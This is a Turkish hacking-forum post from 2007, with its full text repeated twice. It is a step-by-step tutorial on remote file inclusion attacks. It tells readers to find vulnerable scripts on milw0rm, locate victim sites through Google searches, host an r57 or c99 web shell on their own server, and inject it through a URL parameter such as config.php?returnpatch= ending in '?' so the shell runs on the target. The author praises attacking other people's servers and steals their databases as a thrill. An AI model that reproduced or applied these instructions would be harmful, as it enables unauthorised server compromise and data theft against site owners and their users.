SoN-KraL
05-01-2007, 07:12 PM
Merhaba arkadaslar bu dokumanda sizlere File İnclude terıımınden ne ise yaradıgından nasıl uygulandıgından kısaca hakkındakı hemen hemen herseyden bahsetmeye calısacagım.İşimize Hemen baslayalım istersenız cunku konumuz bırazcık uzun...
File Include Nedir? Amacı Nedir?
File ın Türkçe karşılıgı “Dosya” , Include un Türkçe karşılığı ise “içine almak, içermek” tır.Sımdı bu ıkı sozcugu bırlestırgıınızde File Include dosya içine almak eklemek manasına gelmektedır.Pekı terımı anladıysak ne işe yaramaktadır ;
File include bızım ısmınden anladıgımız üzere sistemlere dosya ekleme yada dosya cağırma manasına gelmektedır.Ama burada en onemli olan cagıracagımız dosyanın turu özellikle illegaliate merak saran kışıler için bu dosya turleri cok onemlidir.Ornegın saldırgan birey cagıracagı bir shell(Bunu ilerde acıklayacagım) dosyasıyla servera erisebilir ve serverin içindeki tum bilgileri alıp serverdaki sistemleri hackleyebilir.Bu tıp bir saldırı server sahibi için en az 100 ytl zarar demetir bunun yanında saldırıya yapan birey içinse muthiş bir karizma ve deneyım olacaktır.Peki neden en az 100 ytl zarara ugrar dedım yani sanal neden bu kadar onemli.Size şu şekilde anlatayım isterseniz (genelleme yaparak) bir serverda en az 200 tane site bulunmaktadır.Ve bu serverda bu 200 sitenin içinde su sekilde siteler olucak ;
Domain / Hosting hizmeti veren sistemler ki online olarak calısıp credit cards yoluyla para kazanmaktadırlar eger db yı ındırırse saldırgan o site saibinin durumunu dusunun.
Yada bir şirket sitesi oldugunu dusunun yukardaki onu ıcınde gerekli olucaktır bunun dısında network te cıkıcak bır sorun cok pahalıya patlayacaktır.
Ve tabıkı en onemlisi bir gazıno sıtesı oldugunu dusunun gene database(db) yı saldırganın indirdigini duşunun ve db deki userlar ile siteye giriş yapıp online ounlar oynadıgını dusunun..Ve userın bu tıp poyunler oynamadıgını mahkeme ıle kanıtladıgını dusunun
Neyse konunun cok dagılmasını istemiyorum File Include server sahıblerı için tam manasıyla bas belası hackerlar için se duyadakı en kaliteli meseledir...Kısaca sadece site hacklemekle ilgilenenler içinse HACKın vazgecılmesı durumundadır....
File Include Nasıl Uygulanır ?
File Include uygulnaamsını anlatmak için once bir takım terımleri tanımanız gerekmektedir ;
R57shell: Su anda dunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse INTERNET ın ta kendısıdır.
C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur
Not : Shell linklerini dokumanın sonunda bulabılırsınız... Bular dısında shell yokmudur tabiki var ama en cok bu ikisi kullanılmaktadır
Sımdı gel gelelim zuranın zart dediği yere file include uygulamasının uygulanmasına gecelim...( Bu dokumanda sizlere file include uygulmasanının nasıl bulunacagı hakkında bilgi vermeyecegım sadece bulunmus file inclludelardan nasıl yararlanacagınız ve file include terımınden bahsedecegım ....)))
Simdi arkadaslar guncel vulnerabilities larin(Acıklarin) en cok yayınlandıgı sistemleri size vereyım ilk olarak :::
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (( web apps)
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
seklinde sıralayabilirim genel olarak en genıs archıve milw0rmda bulunmaktadır.O yuzden bu dokumanda onu kullnacagım.Şimdi uygulmali olarak bir siteye saldıralım ki olayı iyice anlayın.İlk olarak vulnerabilities imizi bulalım...
milw0rm.com web apps xxx <-- 3.1 Remote File Inclusion Vulnerabilities
Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda xxx v3.1 sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda
Kod:
xxx.com /[Patch]/config.php?returnpatch=[Shell]
seklinde bir seyle karsılacaksınız.Peki bu ne manaya gelmektedir hemen acıklayayım
xxx.com Bizim saldıracagımız site (Bır nevı kurban site kurban server)
[Patch] Eger site sahıbı kullandıgı scriptin dosyalarını atarken bir dosya içinde attıysa o yanı su sekilde sanalinfaz.com da bulunan forumun Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. un içindedir...
Kod:
Kod:
config.php?returnpatch=[Shell]Buda file includemuzu oldugu bölumdur ki bu devamli degısıklık gosterer ben sadece genel olarak yazıyorum bu su sekildede olabilir
ashnews?returnpatch= yada phpinfo?livestyle= yanı anlatmak istedigim sisteme gore degısecektır.Simdi google da etkılenen sistemi bulalaım.Bunu nasıl yapacagız ılk milw0rm dan buldugumuz dosyanın adı neydi xxx <-- 3.1 Remote File Inclusion Vulnerabilities peki bu ne manaya gelir xxx v3.1 olan sistemlerde dosya sokma acıgının bulundugu manasına gelir bizde google.comda xxx v3.1 seklinde aratırsak yada sistemden yapılmıs herhangı bır sıteye ulasıp altındakı copyrigt yazısını google yazarsanız daha cok site bulabilirsiniz.Ne kadar cok site o kadar cok server demektir.
Simdi gel gelelim file includeumuzu uygulamaya etkilenen sistemi ve nasıl vuln u buldugumuzu ogrendığımıze gore gerıye sadece pratık kalıyor.Şimdi aramadan cıkan sistemlerde deneme yapmadan once bılmenız geren bır sey daha var,
config.php?returnpatch=[Shell] buradaki [Shell] i nasıl koyucaz??
Buda cok basit herhangi bir asp destekli sisteme asagıda linkini verdigimiz shellerdenbirini upload ediniz.Eger win server ( asp destekli server) bulmadıysanız uzulmeyın o zamanda su sekilde bir deneme yapın linux yada free bsd hıc farketmez kaynak kodlarını alın bır .txt metni içine atın ve upload edin kendı hostunuza...(Linkler dokumanın sonunda)
Ben sizin shelli upload ettıgınızı dusunuyorum (linkimiz Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) oLsun ve işime devam ediyorum simdi google aramasına geri donelim... aradıgımız sitelerde simdi seriden tek tek deneme yapıyoruz taki file include u yedirecegimiz bir site bulana kadar ....
Yedirme seklimiz su sekilde olacak...
Kod:
Kod:
xxx.com /[Patch]/config.php?returnpatch=Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. dıkkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası ıcın Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. basa mutlaka konulmalı ve sona da “?” bu konulmalı mutlaka aksı taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...Ben size “?”işsaretinin ne manaya geldigini uzun uzun anlatmayacagım cuku bırazcık dıkat ederseniz ornegın en basit bir php sistemd myprofile?do= bu tıp seylerle karsılasırseınız nedır ne cıdır sızın cıkarmanızı ıstıyorum.Guzel fikirler olucaktır cevaplarınızı bekleyecegım...
Neyse konu dagılmasın olaya geri donelim google da aradım dıyelım buldum...
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Eger yerse kullandıgınız shell e gore asagıda ki gibi bir resım cıkacaktır.(dosyalar sıralanmıs yanında permlerin oldugu )).Perm = İzin
Ve işte soktunuz shelli artık bır nevı server sızın bundan sonrası sadece linux ve linuxun cok buyuk bir yapı oldugunu unutmamk lazım o yuzden bu dokumanımda shell lerin kullanımından bahsetmeyecegım.Umarım anlayısla karsılarsınız..
kısmen alıntıdır. umarım faydalı olur.
ALLAH a emanet olun
File Include Nedir? Amacı Nedir?
File ın Türkçe karşılıgı “Dosya” , Include un Türkçe karşılığı ise “içine almak, içermek” tır.Sımdı bu ıkı sozcugu bırlestırgıınızde File Include dosya içine almak eklemek manasına gelmektedır.Pekı terımı anladıysak ne işe yaramaktadır ;
File include bızım ısmınden anladıgımız üzere sistemlere dosya ekleme yada dosya cağırma manasına gelmektedır.Ama burada en onemli olan cagıracagımız dosyanın turu özellikle illegaliate merak saran kışıler için bu dosya turleri cok onemlidir.Ornegın saldırgan birey cagıracagı bir shell(Bunu ilerde acıklayacagım) dosyasıyla servera erisebilir ve serverin içindeki tum bilgileri alıp serverdaki sistemleri hackleyebilir.Bu tıp bir saldırı server sahibi için en az 100 ytl zarar demetir bunun yanında saldırıya yapan birey içinse muthiş bir karizma ve deneyım olacaktır.Peki neden en az 100 ytl zarara ugrar dedım yani sanal neden bu kadar onemli.Size şu şekilde anlatayım isterseniz (genelleme yaparak) bir serverda en az 200 tane site bulunmaktadır.Ve bu serverda bu 200 sitenin içinde su sekilde siteler olucak ;
Domain / Hosting hizmeti veren sistemler ki online olarak calısıp credit cards yoluyla para kazanmaktadırlar eger db yı ındırırse saldırgan o site saibinin durumunu dusunun.
Yada bir şirket sitesi oldugunu dusunun yukardaki onu ıcınde gerekli olucaktır bunun dısında network te cıkıcak bır sorun cok pahalıya patlayacaktır.
Ve tabıkı en onemlisi bir gazıno sıtesı oldugunu dusunun gene database(db) yı saldırganın indirdigini duşunun ve db deki userlar ile siteye giriş yapıp online ounlar oynadıgını dusunun..Ve userın bu tıp poyunler oynamadıgını mahkeme ıle kanıtladıgını dusunun
Neyse konunun cok dagılmasını istemiyorum File Include server sahıblerı için tam manasıyla bas belası hackerlar için se duyadakı en kaliteli meseledir...Kısaca sadece site hacklemekle ilgilenenler içinse HACKın vazgecılmesı durumundadır....
File Include Nasıl Uygulanır ?
File Include uygulnaamsını anlatmak için once bir takım terımleri tanımanız gerekmektedir ;
R57shell: Su anda dunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse INTERNET ın ta kendısıdır.
C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur
Not : Shell linklerini dokumanın sonunda bulabılırsınız... Bular dısında shell yokmudur tabiki var ama en cok bu ikisi kullanılmaktadır
Sımdı gel gelelim zuranın zart dediği yere file include uygulamasının uygulanmasına gecelim...( Bu dokumanda sizlere file include uygulmasanının nasıl bulunacagı hakkında bilgi vermeyecegım sadece bulunmus file inclludelardan nasıl yararlanacagınız ve file include terımınden bahsedecegım ....)))
Simdi arkadaslar guncel vulnerabilities larin(Acıklarin) en cok yayınlandıgı sistemleri size vereyım ilk olarak :::
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (( web apps)
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
seklinde sıralayabilirim genel olarak en genıs archıve milw0rmda bulunmaktadır.O yuzden bu dokumanda onu kullnacagım.Şimdi uygulmali olarak bir siteye saldıralım ki olayı iyice anlayın.İlk olarak vulnerabilities imizi bulalım...
milw0rm.com web apps xxx <-- 3.1 Remote File Inclusion Vulnerabilities
Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda xxx v3.1 sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda
Kod:
xxx.com /[Patch]/config.php?returnpatch=[Shell]
seklinde bir seyle karsılacaksınız.Peki bu ne manaya gelmektedir hemen acıklayayım
xxx.com Bizim saldıracagımız site (Bır nevı kurban site kurban server)
[Patch] Eger site sahıbı kullandıgı scriptin dosyalarını atarken bir dosya içinde attıysa o yanı su sekilde sanalinfaz.com da bulunan forumun Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. un içindedir...
Kod:
Kod:
config.php?returnpatch=[Shell]Buda file includemuzu oldugu bölumdur ki bu devamli degısıklık gosterer ben sadece genel olarak yazıyorum bu su sekildede olabilir
ashnews?returnpatch= yada phpinfo?livestyle= yanı anlatmak istedigim sisteme gore degısecektır.Simdi google da etkılenen sistemi bulalaım.Bunu nasıl yapacagız ılk milw0rm dan buldugumuz dosyanın adı neydi xxx <-- 3.1 Remote File Inclusion Vulnerabilities peki bu ne manaya gelir xxx v3.1 olan sistemlerde dosya sokma acıgının bulundugu manasına gelir bizde google.comda xxx v3.1 seklinde aratırsak yada sistemden yapılmıs herhangı bır sıteye ulasıp altındakı copyrigt yazısını google yazarsanız daha cok site bulabilirsiniz.Ne kadar cok site o kadar cok server demektir.
Simdi gel gelelim file includeumuzu uygulamaya etkilenen sistemi ve nasıl vuln u buldugumuzu ogrendığımıze gore gerıye sadece pratık kalıyor.Şimdi aramadan cıkan sistemlerde deneme yapmadan once bılmenız geren bır sey daha var,
config.php?returnpatch=[Shell] buradaki [Shell] i nasıl koyucaz??
Buda cok basit herhangi bir asp destekli sisteme asagıda linkini verdigimiz shellerdenbirini upload ediniz.Eger win server ( asp destekli server) bulmadıysanız uzulmeyın o zamanda su sekilde bir deneme yapın linux yada free bsd hıc farketmez kaynak kodlarını alın bır .txt metni içine atın ve upload edin kendı hostunuza...(Linkler dokumanın sonunda)
Ben sizin shelli upload ettıgınızı dusunuyorum (linkimiz Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) oLsun ve işime devam ediyorum simdi google aramasına geri donelim... aradıgımız sitelerde simdi seriden tek tek deneme yapıyoruz taki file include u yedirecegimiz bir site bulana kadar ....
Yedirme seklimiz su sekilde olacak...
Kod:
Kod:
xxx.com /[Patch]/config.php?returnpatch=Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. dıkkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası ıcın Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. basa mutlaka konulmalı ve sona da “?” bu konulmalı mutlaka aksı taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...Ben size “?”işsaretinin ne manaya geldigini uzun uzun anlatmayacagım cuku bırazcık dıkat ederseniz ornegın en basit bir php sistemd myprofile?do= bu tıp seylerle karsılasırseınız nedır ne cıdır sızın cıkarmanızı ıstıyorum.Guzel fikirler olucaktır cevaplarınızı bekleyecegım...
Neyse konu dagılmasın olaya geri donelim google da aradım dıyelım buldum...
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Eger yerse kullandıgınız shell e gore asagıda ki gibi bir resım cıkacaktır.(dosyalar sıralanmıs yanında permlerin oldugu )).Perm = İzin
Ve işte soktunuz shelli artık bır nevı server sızın bundan sonrası sadece linux ve linuxun cok buyuk bir yapı oldugunu unutmamk lazım o yuzden bu dokumanımda shell lerin kullanımından bahsetmeyecegım.Umarım anlayısla karsılarsınız..
kısmen alıntıdır. umarım faydalı olur.
ALLAH a emanet olun